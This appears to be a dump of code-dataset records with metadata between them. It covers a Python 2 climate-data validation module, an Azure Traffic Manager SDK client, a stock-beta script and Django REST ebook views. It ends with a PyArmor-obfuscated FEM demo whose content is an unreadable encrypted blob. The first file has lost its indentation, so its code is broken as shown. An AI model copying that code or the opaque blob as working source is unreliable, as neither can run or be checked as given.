if not type(v) in [types.IntType,types.LongType,types.FloatType]:
raise ValueError, name + ' list/tuple elements must be numbers'
return value
def setSlab(self,name,value):
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
self.data=value
return ('data',value)
elif type(value) == types.StringType:
if os.path.exists(value):
return('file',value)
else:
raise ValueError, value+" : file does not exist...."
elif type(value) == types.NoneType:
return name,value
else:
raise ValueError, name+" must be a slab, a file name or None"
def checkAxisType(self,name,value):
return checkInStringsListInt(self,name,value,[
['uniform','rect','linear'],
'gaussian',
['equal','equal area','equalarea','equal-area'],]
)
def checkAction(self,name,value):
return checkInStringsListInt(self,name,value,['select','mask'])
def setDataSetGrid(self,name,value):
if isinstance(value,cdutil.WeightedGridMaker):
return value
else:
self.grid.grid=value
def setGrid(self,name,value):
if isinstance(value,cdms2.grid.AbstractGrid):
return value
elif value is None:
self.var=None
self.file=None
self.longitude.__init__()
self.latitude.__init__()
self.weightsMaker=None
return None
else:
raise ValueError, name+" must be a grid object or None"
def setSlabOnly(self,name,value):
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
return value
elif type(value) == types.NoneType:
return value
else:
raise ValueError, name+" must be a slab or None"
def getSlab(self,name):
value=getattr(self,'_'+name)
try:
times=self.times
times_type=self.times_type
except:
times=None
times_type=''
if times_type == 'indices':
times=slice(times[0],times[1])
if isinstance (value,numpy.ndarray ) or numpy.ma.isMA(value):
return value
elif type(value)==types.StringType:
f=cdms2.open(value)
if not times is None:
v=f(self.var,time=times)
else:
v=f(self.var)
f.close()
return v
else:
return None
def checkNumberOrNone(self,name,value):
if not type(value) in [types.IntType,types.FloatType,types.LongType,types.NoneType]:
raise ValueError,name+' must be an integer, a float, or None'
return value
def checkIntOrNone(self,name,value):
if not type(value) in [types.IntType,types.LongType,types.NoneType]:
raise ValueError,name+' must be an integer or None'
return value
def checkInStringsList(self,name,value,values):
""" check if value is in values"""
if not type(value)==types.StringType:
        raise ValueError, name + ' must be a string'
elif not string.lower(value) in values:
err=name+" must be in ('"+values[0]
for v in values[1:-1]:
err=err+", '"+v+"'"
err=err+" or '"+values[-1]+"')"
raise ValueError, err
self._basic_set(name,string.lower(value))
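# Maps `value` onto the index of its group in `values`: each entry of `values`
# may be a single string or a list of synonyms, and an integer (or whole
# float) is accepted directly as a group index.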
def checkInStringsListInt(self,name,value,values):
""" checks the line type"""
val=[]
str1=name + ' can either be ('
str2=' or ('
i=0
for v in values:
if not v=='': # skips the invalid/non-contiguous values
str2=str2+str(i)+', '
if type(v) in [types.ListType,types.TupleType]:
str1=str1+"'"+v[0]+"', "
for v2 in v:
val.append(v2)
else:
val.append(v)
str1=str1+"'"+v+"', "
i=i+1
err=str1[:-2]+')'+str2[:-2]+')'
if type(value)==types.StringType:
value=string.lower(value)
if not value in val:
raise ValueError, err
i=0
for v in values:
if type(v) in [types.ListType,types.TupleType]:
if value in v:
return i
elif value==v:
return i
i=i+1
elif type(value)==types.IntType or (type(value)==types.FloatType and int(value)==value):
if not value in range(len(values)):
raise ValueError, err
else:
return int(value)
else:
raise ValueError, err
def checkNumber(self,name,value):
if not type(value) in [types.IntType,types.FloatType,types.LongType]:
raise ValueError,name+' must be an integer or a float'
return value
| [
"spascoe@a6d0c4e4-8e0a-0410-98ec-c2d9f1a29e40"
] | spascoe@a6d0c4e4-8e0a-0410-98ec-c2d9f1a29e40 |
c6ffc01ccd2fef7fd14b1b92c3b9804fbc7736d3 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/trafficmanager/azure-mgmt-trafficmanager/azure/mgmt/trafficmanager/aio/_traffic_manager_management_client.py | 414fda36d754fc895ce50031a1c07e841b208c4c | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 5,213 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import TrafficManagerManagementClientConfiguration
from .operations import EndpointsOperations
from .operations import ProfilesOperations
from .operations import GeographicHierarchiesOperations
from .operations import HeatMapOperations
from .operations import TrafficManagerUserMetricsKeysOperations
from .. import models
class TrafficManagerManagementClient(object):
"""TrafficManagerManagementClient.
:ivar endpoints: EndpointsOperations operations
:vartype endpoints: azure.mgmt.trafficmanager.aio.operations.EndpointsOperations
:ivar profiles: ProfilesOperations operations
:vartype profiles: azure.mgmt.trafficmanager.aio.operations.ProfilesOperations
:ivar geographic_hierarchies: GeographicHierarchiesOperations operations
:vartype geographic_hierarchies: azure.mgmt.trafficmanager.aio.operations.GeographicHierarchiesOperations
:ivar heat_map: HeatMapOperations operations
:vartype heat_map: azure.mgmt.trafficmanager.aio.operations.HeatMapOperations
:ivar traffic_manager_user_metrics_keys: TrafficManagerUserMetricsKeysOperations operations
:vartype traffic_manager_user_metrics_keys: azure.mgmt.trafficmanager.aio.operations.TrafficManagerUserMetricsKeysOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Gets subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = TrafficManagerManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.endpoints = EndpointsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.profiles = ProfilesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.geographic_hierarchies = GeographicHierarchiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.heat_map = HeatMapOperations(
self._client, self._config, self._serialize, self._deserialize)
self.traffic_manager_user_metrics_keys = TrafficManagerUserMetricsKeysOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "TrafficManagerManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"[email protected]"
] | |
32bdf883d5a8cc13ed9969d566847901edc019e4 | 82a477b29e870161d5e6b57b3978459520d819af | /get_beta.py | 10f2388bce6a36408d34541eeec3186cf9975473 | [] | no_license | felipm13/finance | afbeb15b9cc08a4c0a9f11c8c4d5efa7186174d3 | f981501f17697bf00638af062a0ac0ac3ea9dee9 | refs/heads/master | 2020-04-13T09:39:41.684032 | 2018-12-26T01:31:16 | 2018-12-26T01:31:16 | 163,117,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | import pandas as pd
from scipy import stats
vale = pd.read_csv('VALE3.csv', parse_dates=True, index_col='Date')
ibov = pd.read_csv('IBOV.csv', parse_dates=True, index_col='Date')
# joining the closing prices of the two datasets
monthly_prices = pd.concat([vale['Close'], ibov['Close']], axis=1)
monthly_prices.columns = ['VALE3', 'IBOV']
# check the head of the dataframe
#print(monthly_prices.head())
# calculate monthly returns
monthly_returns = monthly_prices.pct_change(1)
clean_monthly_returns = monthly_returns.dropna(axis=0) # drop first missing row
#print(clean_monthly_returns.head())
# split dependent and independent variable
X = clean_monthly_returns['IBOV']
y = clean_monthly_returns['VALE3']
slope, intercept, r_value, p_value, std_err = stats.linregress(X, y)
print("Beta: ", slope)
| [
"[email protected]"
] | |
4d19b1f3d5c877e2dafccaef7ddd45c29aafc50f | 4c71193d1e46c658e4b91b88318bf98efe71d2bb | /ebooks/views.py | a5e661a00f8dcec5e8d76c8301a64c14e26ab1fd | [
"MIT"
] | permissive | AFHEEM/ebooksapi | df2d91f26ac78580725db1a5e71739860e1aef8f | 5ed73c606439f972e64d116f2322410c19beec7d | refs/heads/master | 2023-05-09T08:06:59.560231 | 2021-06-07T11:10:54 | 2021-06-07T11:10:54 | 374,370,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,874 | py | # from rest_framework import mixins
from rest_framework import generics
from ebooks.models import Ebook, Review
from ebooks.serializers import EbookSerializer, ReviewSerializer
class EbookListCreateAPIView(generics.ListCreateAPIView):
"""
    List and create Ebooks
"""
queryset = Ebook.objects.all()
serializer_class = EbookSerializer
class EbookDetailAPIView(generics.RetrieveUpdateDestroyAPIView):
"""
    Retrieve, update or delete an Ebook
"""
queryset = Ebook.objects.all()
serializer_class = EbookSerializer
class ReviewCreateAPIView(generics.CreateAPIView):
"""
Create a Review
"""
queryset = Review.objects.all()
serializer_class = ReviewSerializer
def perform_create(self, serializer):
"""
Override Review creation
:param serializer:
:return:
"""
ebook_pk = self.kwargs.get('ebook_pk')
ebook = generics.get_object_or_404(Ebook, pk=ebook_pk)
serializer.save(ebook=ebook)
class ReviewDetailAPIView(generics.RetrieveUpdateDestroyAPIView):
"""
Get, update and delete a review object
"""
queryset = Review.objects.all()
serializer_class = ReviewSerializer
# class EbookListCreateAPIView(mixins.ListModelMixin,
# mixins.CreateModelMixin,
# generics.GenericAPIView):
# """
# Display Ebooks as a list
# """
# queryset = Ebook.objects.all()
# serializer_class = EbookSerializer
#
# def get(self, request, *args, **kwargs):
# """
# Get all ebooks
# :param request:
# :return:
# """
# return self.list(request, *args, **kwargs)
#
# def post(self, request, *args, **kwargs):
# """
#         Create an ebook
# :param request:
# :return:
# """
# return self.create(request, *args, **kwargs) | [
"[email protected]"
] | |
da75986cbc1d4510dcb5325a595f3096edd3d2ec | c8c1c8b3327ae93ceaa671681d5f9eac0933e738 | /mrgpylinux/femcalc/examples/fem/demo_line_assembly.py | 837c8b5d5ef20759ed65594190a3a3dedcd59fb6 | [] | no_license | gpspelle/acoustic-pollution | bbb2a6492b3d02d046cb533470affabcacb38409 | ad80f1fd582f47ce679748bb6ac93ff3149fd445 | refs/heads/master | 2022-07-28T06:49:20.493083 | 2019-11-15T00:27:52 | 2019-11-15T00:27:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,027 | py | __pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x06\x00\x33\x0d\x0d\x0a\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x7b\x0a\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xeb\x50\x8c\x64\x26\x42\xd6\x01\x6f\x0f\x27\xa2\x64\x8d\x1e\xb5\x54\xd9\x61\x57\x2f\x56\x8b\xbd\xed\xc2\xbe\xf6\x72\xf3\xcd\xb6\xf9\x10\x10\x41\x05\xc7\x37\xbe\x1f\x99\xc6\xea\x7b\x42\x99\x17\x72\x70\xda\x72\xb1\xc4\x68\xbc\xd7\xfd\xab\x27\x7d\x42\xc3\x26\x20\xe4\xad\x09\x1e\x83\x33\x79\x49\x5a\xc1\x2a\x98\x25\x2c\x50\x0e\xef\x93\x50\xcf\x61\x21\x40\xf1\xa7\xdf\x52\x5c\x7f\xfc\xe1\xa8\xa8\x7b\xb7\xbe\x98\xff\x15\xae\x70\x84\x8c\x7f\x7f\x6d\x97\x37\xd0\x51\xcb\x31\xed\xe8\xe7\x35\xe6\x46\x33\x20\x7d\x81\x1e\xb2\x31\x56\x57\x16\xe2\x91\xc2\x3f\xd3\xc0\xd6\xe0\x97\xa1\xca\xae\x5f\x03\xc9\x9d\x25\x55\x19\x84\xcf\x64\x94\x8b\x2d\x4b\x90\x55\xb2\x9f\xea\xf1\xe0\x34\xbd\xef\x1d\xe4\x9f\xe9\x4d\x48\x4f\xf4\x07\xd1\xfd\xbc\xcc\xec\x8d\x1a\x16\x22\x42\x29\xa0\x23\x42\x27\x6a\x55\x6e\x48\x8c\xde\xd9\x68\xa2\x3d\x6a\xc7\xd6\x98\xc5\xd6\x08\x26\x76\x8f\x22\xa4\x7a\x37\xb5\x95\x38\xe2\xa7\x23\xfc\xb4\xb7\x2f\x18\x5d\x6b\xf2\xb9\xcc\x86\x62\x0d\xbd\x36\x34\x75\x56\x3c\x57\x2e\x16\x40\x08\xd9\x28\x42\xd5\xf4\x17\xbb\x23\xf7\x91\x74\xe9\xf7\x9f\xa2\x1e\x52\x7a\x5e\xa7\xdf\xf3\xff\xbe\xb1\xa8\x9b\xc2\xc8\x0e\x99\xe4\xa3\xd9\x25\xf4\xb6\x3e\xbf\x04\x96\xc9\x8f\xc8\xb8\x17\x21\x28\xa5\x3c\x22\x61\xe6\xe5\x9f\x78\x47\x4b\xc2\x33\x56\x64\xb0\x49\x27\x35\xf8\x53\x2e\xb5\xd7\xf6\x57\x36\x4c\xfa\xa9\x35\x25\x54\x91\x2d\x1d\x3d\xd9\x8a\x4e\xbd\x65\x22\xa2\xd4\x79\xa2\xbc\x9f\xd1\xda\x6f\xd9\x43\x63\x69\x6c\x21\x89\x06\x7c\x4d\xb8\x31\x43\x95\xb5\x37\x53\xf0\xad\x78\xc0\xf9\x57\x07\xdb\xb3\x43\x9d\x9c\x60\x77\xad\x3f\xd7\x33\x7e\xa1\x82\xc8\xaa\x1e\x23\x17\x65\x5e\x8b\xe9\xc6\x14\xa1\xd6\x67\xbf\x09\xd6\x38\x14\x0f\x3a\xa4\xc1\x8d\xe0\x22\x95\xf1\xc7\x7b\x1f\x0e\x92\x27\x87\xdc\x01\xcf\x34\x83\x3b\x75\xe5\x22\x2d\xfb\x91\x55\x50\xa2\xbd\x95\x7e\xcf\x23\x22\x1a\x99\x7d\x50\xff\x4d\x71\xd4\xa3\xf9\x6b\x6a\x7d\x35\xc0\xee\x24\xf7\xc4\x13\x7c\xdd\x99\xd7\x75\xf8\x5c\x84\x8b\xe4\x7f\xee\x1b\xcc\xad\x70\x69\x7c\xba\xfb\xcd\xc3\x84\xf5\x4e\xa6\x82\xa3\x4e\x71\xcf\x0b\x79\xe3\xbc\x55\x73\x93\xd5\x15\x1f\x0a\xe0\x6f\x3a\x6e\xcc\xf2\x15\xf6\x21\xcb\xde\x30\x96\x4b\xb7\x50\x76\x9b\x6e\x0c\xb1\x2a\x3e\xcd\x57\x4b\x37\x40\xcd\x80\x88\x9f\xe8\x44\x48\x41\x69\xcb\x10\xf4\x8e\x35\x67\x64\xf9\x73\xb8\x4b\xcd\x39\xe5\x2a\x5b\x84\xfd\x52\xad\xba\x55\x96\xb4\x25\x09\x62\xa3\xdf\xea\xb1\x17\xde\xb0\x0d\xa7\x96\x40\x1a\xc2\x94\xcc\x4a\x86\x3b\x7c\x79\xd0\x36\xb7\x73\x0f\xfb\xbe\x91\xbc\x58\x8e\xf1\xe4\x91\x4d\x94\x85\x8a\x1a\xb2\xc5\x62\xcb\xe3\x7d\x81\x72\x2c\x34\xa7\x44\x7f\x93\x6e\x1c\xc7\xdf\x78\x63\x05\xa4\x63\x22\x05\x28\x31\xe0\xe8\x0d\xd8\xcc\xb0\xaa\xb6\xe5\x47\x10\x39\x4e\x9c\x99\xc4\xbf\x4f\x04\xc0\x90\x7b\x89\x7e\x89\x6c\x86\x56\x74\xf2\xb5\x1c\xb5\x2f\xeb\x4a\x10\x9c\x57\x2c\xdd\x0d\xe0\x4b\x3c\x42\xa9\x6c\x3d\x54\x89\x73\x1a\x7a\x15\x35\x7e\x22\x
02\x05\xb1\x73\xe8\x3f\x0f\xdd\xb9\x7a\x5d\xb2\x48\x06\x4a\x3f\xf1\x8d\xb1\xd4\xd8\xd1\x61\xbb\x1b\x10\xb8\x69\x33\x02\x22\xa4\xf5\x0e\x2d\x80\x20\xe5\x54\xcd\xf7\xd8\x27\x18\x40\xd4\x52\xa9\xb9\xfc\x7f\xa5\x09\x22\x78\xd4\xcb\x5c\xb2\xa0\x6c\xca\x2c\x99\x38\x72\xcf\x1e\x87\x0d\xdf\xcc\x27\xa2\xc6\xce\x50\xd9\xfd\x06\x6b\x42\x9f\x31\xe1\x86\x6c\xd4\xb1\xf1\x3b\xd1\x59\x8c\xb8\xb5\x96\x95\x22\xdc\xec\x4b\xfe\x75\x6e\x22\x26\xad\x16\x44\x52\x93\xef\x52\x9e\x08\x82\x5e\xc3\x4d\x9d\x7c\xf1\x09\xd0\x8d\x8b\xec\xb1\xeb\x5b\x08\x82\xf1\x1a\x62\xcf\x98\x90\x52\x2e\x77\x9e\xbc\xcb\x43\xd7\xc7\xa2\xc7\x84\xf1\xbe\xc3\xe9\x9a\x06\xbb\xa5\x2f\x8c\x2b\xc0\xba\x07\x91\xea\x04\xf5\x80\xe8\xc6\x62\xf4\x81\x87\x9b\xc6\xb1\x28\xfa\x84\xf3\x2c\x24\x61\xaf\x1f\xc0\xa2\x1b\xda\x74\x91\x59\x08\x81\xe2\x15\xbc\x50\x2b\xd7\x3e\x3c\x36\x4b\x5a\x2a\x71\xdb\xbe\x28\xba\x12\xc5\x95\x44\x5b\xa8\x84\xa4\xf6\x1f\xa2\xe0\xd3\x22\xf3\x6c\x98\x11\x79\x85\x6d\x81\xee\x3f\x0b\xd1\xb3\x51\xaf\xe1\xcf\x9e\xff\x88\x53\x27\x38\x10\x6c\x1e\xad\x8b\x01\x0b\xac\xd1\x08\x83\x7b\x09\x9f\x87\x1f\x1d\x29\x38\x43\x09\x58\xbb\xc3\x0a\xdd\x4c\x18\x9e\x95\xa6\x1d\x3f\x8b\x72\xe8\xa7\x61\x58\xde\x8f\xba\x45\x97\x27\xe7\x3d\xf4\x59\x95\x45\xe2\xd8\x4b\x72\xec\xcc\x1d\x82\x19\x46\x8e\xdf\x4a\x7a\xb3\xd8\x6f\xe5\x04\x2e\x00\xb7\xee\x7f\x44\x2a\xeb\xaf\x5f\xe9\x9b\xfa\x8d\x5d\x7a\x76\x71\x2f\xc5\xf1\xa7\x9a\xc9\x93\xa2\xe0\x9c\xbd\x1e\x47\xfb\x61\x3b\x58\x34\xd6\x10\xbc\x6f\x17\xa1\x9d\xfd\x32\xd3\x96\x0e\xba\x27\x2c\xe4\x2e\x5c\x21\xbb\x9e\xbe\x5c\x15\x87\xcf\x77\x4d\x24\xdf\xee\x1e\x78\xb2\xcd\xe0\x91\xb2\xa2\x8d\x03\x99\x00\xbc\x3b\x86\x20\x8f\xe9\x4b\x35\xf6\xe8\x24\x3e\x8b\xe2\x9c\xb9\x2a\xaa\xa6\x19\x24\x11\x46\x10\x7b\xd4\xb4\x12\x81\x8f\x0a\x0c\x6a\xcc\x11\x41\xe9\x61\x15\xba\x12\x3c\xcc\xd0\xe7\x5c\x61\xf4\x1c\x12\x5f\xe4\x24\x55\x2f\x3c\xe3\x34\xde\xf0\x3e\x9e\xaa\x1f\xc4\xa1\x4b\x02\x52\x72\x99\x64\xb2\xbc\x34\x02\x7c\x8a\x07\xa9\xea\xbf\x6b\x74\x3f\xaa\xb2\x7e\x06\x01\xea\x5b\x07\x62\x8f\x0d\xf6\xc1\xce\xde\x97\x43\x5a\x2d\x86\x6d\x17\x35\x65\x5c\xb2\x8b\x32\x55\xdf\x71\x70\xda\xd5\x51\x8a\x7d\xa4\x05\xcd\x29\x1e\x6b\x61\x0a\xc4\x34\x4d\x99\x00\xc2\xbc\x25\x5b\x01\x54\xf3\xe6\x73\x8b\x8d\x69\x83\x62\x58\x54\xf8\xa5\x50\xfa\x5a\x93\xad\x89\x36\x8b\x18\x75\x52\xfc\x7e\xca\x0b\x2c\xf8\xba\x78\xd7\x96\x8e\x84\x36\x31\xc1\x85\x45\xaf\xe1\x1d\xf1\x00\x48\x6f\x92\x6f\xcd\x47\x10\xb8\x92\xaa\xc4\x87\xfe\xd1\x12\xfc\x6e\x3a\x93\xef\x03\x0b\x62\xba\x46\x1f\x3f\x0a\x40\xa2\xd8\xb0\x93\x77\x93\xd2\x5e\xd6\x15\xb1\xb6\x3b\xab\x22\x69\x53\xfd\x38\x0b\x82\xaa\x4e\x9f\xbc\x7e\xde\x2f\x66\xbb\xd7\x04\x88\x2f\x9a\xf7\x54\xb5\xb1\x46\x00\xbb\x37\x68\x30\xd0\xb0\x58\xe6\xd6\x46\x44\x00\x5a\xee\x4e\x4e\x85\xf3\x96\xb7\x06\x1a\x89\xe9\xd1\x74\x84\x6c\x97\xaa\xee\x4b\x03\xe8\x24\xce\x70\x05\x26\x85\x7e\x50\x6c\x6f\x08\x42\xd7\xcc\x3a\x10\xff\x08\x47\x24\x66\x8c\xe5\xe5\x68\x3a\x43\x48\x0a\x75\x9f\xd3\xc3\x8f\xb2\x58\x38\x54\x04\xdb\xc1\xfc\x42\x4c\x2d\x38\xe7\x1a\x06\x9b\xc6\xab\xba\x33\x54\xc8\xae\x17\x1e\x10\x67\x4a\xb1\x09\x99\x0c\xe5\xb9\x34\xd8\xf3\xd7\xdb\xc2\x42\x51\xdd\x5f\x3f\x53\xa7\x78\x06\x97\x26\xb1\xb5\xb6\xe6\x17\x38\xe8\xbb\xaf\x98\x57\x9c\x92\x8a\x3e\x2a\x30\x70\xbe\xce\x97\x69\xd3\x54\x8e\x22\xec\xdc\x4a\xf4\xb5\x5b\xa3\x37\x5a\x2c\xbf\x77\x2a\xfd\x79\xb4\x5e\x6c\x88\x1c\x07\x53\xcf\x8d\xa2\x4b\x68\x4d\x66\xe8\x89\x26\x15\x39\x1c\xa9\x3a\x1b\x32\xd1\xd1\xb6\x18\x9f\x46\xb2\x73\x69\x12\x77\x84\xdf\xfe\xb8\xfd\x2b\xc5\x4d\x37\x0c\xec\x5e\x4c\x74\x72\xc7\x54\x20\x66\x58\xda\x6b\xf3\x9b\x22\xfe\xcd\x93\x81\x4b\xba\x98\xb1\xf8\x28\xb4\x22\x31\
xc6\x33\x33\x4c\x32\x3d\x58\x23\x83\xcf\x53\x60\x76\xcf\xab\x8f\x59\x10\x05\x02\x60\x9e\xb7\x72\x8d\xef\xfd\x36\x11\x04\xdd\x79\x0e\xe8\xb7\xc7\x3b\x3d\xcf\x43\xd0\x4e\xd9\x3e\x66\x9f\x40\xcc\xe8\x40\x95\x1a\x2b\xd6\x92\x3a\x85\xb9\x67\x50\x1e\x3a\x51\xb5\x0a\x21\xdf\x94\x85\x74\x7a\xf3\x71\xa8\x92\xc1\xb9\x5e\x05\x77\xa3\x41\xd7\xc2\xdb\xa4\x8f\x8d\x63\xef\xb3\x0e\xdb\xe7\x63\x0a\x1b\x31\x05\x0d\xa9\x04\x9d\xa8\xf1\x75\x8d\x6b\xd5\x75\x1a\x1d\xa7\x67\xd2\xa9\xcf\x71\x39\x84\x46\x42\xf2\xba\xfa\x7d\x57\xef\x22\x16\xca\x85\xe2\x2b\x6c\x72\x5f\x4f\x09\x8b\xa3\xc0\xf7\xf7\x2c\x0f\x31\x35\x44\xb1\x25\x54\x37\x64\xf7\xcb\x13\x0a\x27\x9d\x3a\xde\x37\x86\x32\xc5\x6e\x4f\x00\x46\x7b\x2f\x59\x30\x44\x67\x17\xa1\xbb\xdd\x33\xae\x67\x2a\xec\xb4\xad\x4d\x52\x49\x4c\xfd\x37\x77\xb1\xde\xef\xde\x6c\x42\x07\xe7\x09\x9c\xde\x8d\x22\xf3\x6b\xce\x55\x11\xf5\xdf\x8b\xd5\x1b\xd5\x40\x5d\x98\xd2\x3a\x0e\xea\x8c\x08\x6e\x37\x2f\x98\x34\x5b\x02\x64\x45\x6b\x46\xec\x37\xb7\xd0\x96\x34\xf1\x94\x3e\xca\x83\x5d\x73\xa7\x31\xdc\xc4\xa9\x2b\x49\x4c\xfd\xef\xc4\xf4\x2a\x66\x39\xc5\xaa\x33\x2d\xa5\x22\xec\x9f\xaf\x04\xf9\x86\x1b\xd8\x9e\xc1\xfb\xa4\x37\x12\x6d\x60\xc7\xd3\xa8\xd0\xb0\x7e\xc2\xb8\x77\x2f\x97\x27\x14\x0d\x72\x2a\x56\xe0\x06\x69\x4c\x0b\xd9\x4f\x4a\xd5\xcc\x5d\x11\xdf\xea\xc7\x59\x74\x8d\x32\x90\xa2\x4b\x3e\x7e\x28\xdf\x3f\x6a\xdb\xb5\x4e\xf0\xed\x22\x5e\x43\x84\x21\xcf\x67\x01\x7e\xb5\xa2\x70\xa5\x05\x35\x14\xca\x69\x27\x8c\x6b\xbb\x94\x63\xac\xf1\x0b\xdb\x2b\xbe\x49\x9f\x55\x47\x82\x58\xce\xc3\xad\xc9\xe1\x48\x8d\x6f\xc9\x4f\xea\x10\xb2\x29\xb0\x77\xd3\xed\x57\x3b\x53\x16\xb1\x2f\x83\xee\x3e\x7d\x32\x0c\x8e\x19\xb2\x79\x24\x5c\xb9\x56\x20\x68\x2a\x72\xc0\x70\x65\x2c\x07\x06\xc2\x40\x87\x7e\x4d\xb9\x91\xf2\x8d\x0b\x09\xe3\xb9\x6e\x55\xaf\x7a\x8e\xa7\x1a\x39\x59\x86\xc1\x9b\x96\x0d\x47\xf7\x61\x9f\xc7\xe1\x2c\x8a\x43\x9c\x57\xa5\xb2\x8b\x95\xf9\x42\xbe\x19\x27\x8c\xf9\x9a\xa1\x2c\xdd\xde\x74\x96\x14\x4e\xcc\xf7\xea\x80\x6c\xc1\x4a\xb7\xd3\x91\xd2\xb0\xba\xd9\x8f\x4c\xa0\xd4\x8b\x47\xf5\x0b\xc2\x82\x8e\x32\x69\x4e\xc8\x43\x0a\xf6\x2b\x55\xc5\x32\x50\xa9\x97\x24\x8f\x4e\x26\xe9\x8a\x63\xa1\xa3\x03\x8b\x3f\x9f\xe6\x79\x97\x1e\xe0\x1f\x97\xfc\xab\x28\x81\x02\x98\xba\x77\x45\xcc\x29\xe7\xfa\xa8\x93\x07\x52\x7b\x94\xe1\x38\x82\x85\x2b\xbb\xba\x11\x39\x50\xe2\x82\x91\x1b\xd8\x8a\x53\x21\xb3\x5a\x6f\xd5\x63\x79\x11\x40\xef\xa4\x45\xac\xc9\x32\xbc\x3a\xe7\x4e\x87\x7e\x33\xc4\xdf\x04\x13\xaa\x54\xa1\xde\x8d\x03\xab\xe4\x77\x01\x3b\x21\x54\xc6\x12\xbf\x64\x1d\x73\x61\x9c\xec\x47\x8c\xed\x15\xd3\x9f\xd2\xe7\xae\x25\x47\xf9\x78\xd7\x9b\x1d\x39\x4f\xc2\x09\x38\x01\x9e\x06\x0e\x15\x19\x80\x59\xb5\x86\x31\x0f\x86\xb2\x35\xf5\xe2\x07\x72\x4c\x8c\xa2\x00\x26\x3d\x69\x72\x0c\x78\x6e\x5f\xe0\x61\x6e\xb9\x38\x31\xb3\xf3\xe2\x4e\x66\x70\x21\xb3\xb4\x18\x4e\x56\xb4\x1f\x39\x90\xad\x0d\xcc\x54\xcf\x04\xa9\x8a\x0b\xd2\xd5\xc6\xae\x5a\x75\x0e\xce\x33\x91\xe4\x21\x0a\xce\x5b\x12\x14\x7f\x4c\x73\x26\xc1\x93\x89\x76\x88\x81\xf9\x6c\x30\x57\xb7\x24\x8c\xb6\x78\x94\xd4\x0b\x8e\xd9\x60\x40\x1a\x25\x7d\x69\x93\x5d\xcb\xbc\xbf\xba\xba\x47\x7b\xc7\xec\x3b\x0d\xfb\x2b\xa7\x09\x7a\xa1\xf2\x63\x7f\xb0\x61\x95\x29\xcc\x3c\xf0\x84\x54\x87\xcc\x80\x4b\xbd\x3e\x2c\x64\x81\xee\x3f\x7b\xd1\xda\x0b\x83\x95\x98\x3e\x5c\x09\x4b\x44\xd7\xf7\x71\x77\x8b\x37\xaa\x5a\x42\x69\xe6\x6e\xc6\x8c\x55\x26\xeb\xfc\x89\x7b\x50\xf7\x2e\x10\xaf\xb4\xf3\xbd\xbd\x25\xeb\x37\x50\x46\xf8\xb3\x05\x42\xc5\x5e\x41\x16\xb5\x1d\x53\x90\x26\xfe\xdb\x9e\x7d\xb1\x1b\x83\x42\x21\x21\x69\x90\xda\x99\x00\x28\xaa\x03\x88\x90\x3f\x20\x0c\x7a\xa2\xcd\x3f\xff\x17\xe1\x51\x30\xec\x51\x0f
